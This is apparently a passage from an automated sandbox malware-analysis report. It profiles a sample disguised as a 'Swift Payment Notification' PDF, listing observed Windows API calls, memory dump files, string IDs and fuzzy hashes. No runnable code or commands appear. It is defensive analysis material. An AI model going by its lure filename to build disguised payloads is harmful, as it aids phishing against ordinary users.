                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                                                                              • String ID: H
                                                                                                                              • API String ID: 3613100350-2852464175
                                                                                                                              • Opcode ID: b68d4979b8631e72a1d3032194365e84736a8b908637ec4c914fd8b44f711df3
                                                                                                                              • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                                                                              • Opcode Fuzzy Hash: b68d4979b8631e72a1d3032194365e84736a8b908637ec4c914fd8b44f711df3
                                                                                                                              • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                                                                              APIs
                                                                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                                                              • DestroyWindow.USER32(?), ref: 00426F50
                                                                                                                              • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                              • String ID: close all
                                                                                                                              • API String ID: 4174999648-3243417748
                                                                                                                              • Opcode ID: 4052fa3676dac3e377c2eda6cd32e3dbff7831d3d551d493591d62a78ae4b3a8
                                                                                                                              • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                                                              • Opcode Fuzzy Hash: 4052fa3676dac3e377c2eda6cd32e3dbff7831d3d551d493591d62a78ae4b3a8
                                                                                                                              • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                                                              APIs
                                                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                                                                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1291720006-3916222277
                                                                                                                              • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                                              • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                                                                              • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                                              • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                                                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                                                              • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Window
                                                                                                                              • String ID: -----$SysListView32
                                                                                                                              • API String ID: 2326795674-3975388722
                                                                                                                              • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                              • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                                                              • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                              • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                                                                              APIs
                                                                                                                              • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                                                              • IsMenu.USER32(?), ref: 0045FC5F
                                                                                                                              • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                                                              • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                              • String ID: 0$2
                                                                                                                              • API String ID: 93392585-3793063076
                                                                                                                              • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                              • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                                                                              • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                              • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                                                                              APIs
                                                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                                                                              • String ID: crts
                                                                                                                              • API String ID: 586820018-3724388283
                                                                                                                              • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                              • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                                                                              • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                              • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Cleanup$Startupgethostbynamegethostnameinet_ntoa
                                                                                                                              • String ID: 0.0.0.0
                                                                                                                              • API String ID: 1500336939-3771769585
                                                                                                                              • Opcode ID: 12bd0bd87adc01a11e762e32582fe9f9ee670ff773acf44d869f4b862077f2e3
                                                                                                                              • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                                                                              • Opcode Fuzzy Hash: 12bd0bd87adc01a11e762e32582fe9f9ee670ff773acf44d869f4b862077f2e3
                                                                                                                              • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe), ref: 00434057
                                                                                                                              • LoadStringW.USER32(00000000), ref: 00434060
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                                                                              • LoadStringW.USER32(00000000), ref: 00434078
                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                                                                              Strings
                                                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                                                                              • C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, xrefs: 00434040
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleLoadModuleString$Message
                                                                                                                              • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                              • API String ID: 4072794657-654671058
                                                                                                                              • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                                              • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                                                                              • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                                              • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                                              • SendMessageW.USER32(766E05F0,00001001,00000000,?), ref: 00448E16
                                                                                                                              • SendMessageW.USER32(766E05F0,00001026,00000000,?), ref: 00448E25
                                                                                                                                • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3771399671-0
                                                                                                                              • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                                                                              • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                                                                                                                              • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                                                                                              • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                                                                                                                              APIs
                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00434EE8
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00434F0B
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00434F37
                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00434F3E
                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00434F64
                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00434F6D
                                                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00434FA8
                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00434FB6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3761583154-0
                                                                                                                              • Opcode ID: 578008cf164025d5ecb4696b6156a799cccfc77f2b785838d4f70d05d78de077
                                                                                                                              • Instruction ID: 62a2b3f98caf240b0b87dceec1cde1b3ad41479520e9ab1bd59fe61f77259947
                                                                                                                              • Opcode Fuzzy Hash: 578008cf164025d5ecb4696b6156a799cccfc77f2b785838d4f70d05d78de077
                                                                                                                              • Instruction Fuzzy Hash: A631A5327001186BC710AB99EC49FEFB7A8EB8C731F14427BFA09D7290DA759844C7A4
                                                                                                                              APIs
                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004175EC
                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004175F9
                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00417606
                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00417613
                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00417620
                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0041763C
                                                                                                                              • InterlockedDecrement.KERNEL32(00000000), ref: 0041764C
                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00417662
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DecrementInterlocked
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3448037634-0
                                                                                                                              • Opcode ID: 2d90712be0f5ac005b3e143ee6e6a3ff062905945baf7aad3938d434ed8910c2
                                                                                                                              • Instruction ID: a7806976ab87669462c8841b6c00aae0a755f449dc62de05c426b9540ffcc43f
                                                                                                                              • Opcode Fuzzy Hash: 2d90712be0f5ac005b3e143ee6e6a3ff062905945baf7aad3938d434ed8910c2
                                                                                                                              • Instruction Fuzzy Hash: FB113071B04615A7DB109B7DCC84B97B7BDAF44754F184417A508D7244DB78EC80CBB8
                                                                                                                              APIs
                                                                                                                              • InterlockedIncrement.KERNEL32(004115F6), ref: 00417555
                                                                                                                              • InterlockedIncrement.KERNEL32(00006B48), ref: 00417562
                                                                                                                              • InterlockedIncrement.KERNEL32(61C8E856), ref: 0041756F
                                                                                                                              • InterlockedIncrement.KERNEL32(FF8BC359), ref: 0041757C
                                                                                                                              • InterlockedIncrement.KERNEL32(0286E856), ref: 00417589
                                                                                                                              • InterlockedIncrement.KERNEL32(0286E856), ref: 004175A5
                                                                                                                              • InterlockedIncrement.KERNEL32(50F0458D), ref: 004175B5
                                                                                                                              • InterlockedIncrement.KERNEL32(00006DCB), ref: 004175CB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: IncrementInterlocked
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3508698243-0
                                                                                                                              • Opcode ID: 135d360ea79174b1c941fff99ef5a2e76c5bdc67544c7251d2319710911153bb
                                                                                                                              • Instruction ID: 2b54aa213fc303e87487d6d7f5f44cae7e3f65ddbbee17ff61441cf1ee9523fe
                                                                                                                              • Opcode Fuzzy Hash: 135d360ea79174b1c941fff99ef5a2e76c5bdc67544c7251d2319710911153bb
                                                                                                                              • Instruction Fuzzy Hash: 2D110C71B04215BBDB109B79CC84BABBBAEAF44344F084827A508D7640CB78E950CBB4
                                                                                                                              APIs
                                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                                                                              • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                                                                              • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                                                                              • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                                                                              Strings
                                                                                                                              • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Variant$InitTime$ClearCopySystem
                                                                                                                              • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                                              • API String ID: 134932582-1568723262
                                                                                                                              • Opcode ID: e11f4cdbd8b178bb717da899e9b466e6e84e140d5ce5b896a0b9345fcfa3a66e
